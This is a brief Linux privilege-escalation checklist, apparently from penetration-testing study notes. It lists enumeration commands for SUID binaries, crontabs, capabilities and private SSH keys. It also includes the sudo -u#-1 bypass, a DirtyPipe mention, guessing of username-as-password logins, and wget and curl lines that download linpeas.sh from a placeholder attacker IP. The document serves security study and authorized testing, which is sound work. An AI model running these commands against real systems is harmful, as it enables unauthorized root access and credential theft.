Checklist

id

find / -group <groups> 2>/dev/null

history

sudo -l

sudo -V | grep version

find / -name id_rsa 2>/dev/null

find / -type f -perm -04000 -ls 2>/dev/null

Research any binary with a SUID bit that looks out of place

DirtyPipe can be used to abuse custom SUID binaries

ls -la /etc/passwd /etc/shadow

cat /etc/crontab
crontab -l

getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

cat /etc/exports

ls -la /var/backups

sudo -u#-1 /bin/bash

ss -anp
routel
cat /etc/iptables/rules.v4

dpkg -l

cat .bashrc

ps -aux
ps -aux | grep cron        <-- search for "root   /usr/sbin/cron -f"

Snoop on processes using pspy - some cron jobs may be running in the background

Research and enumerate literally every cron job running

su into other users using their usernames as passwords; vagrant:vagrant

Search for credentials in files

Run PEAS and LinEnum

wget 192.168.45.x/linpeas.sh 
curl 192.168.45.x/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh

Search for exploits for sudo version

Last updated 1 year ago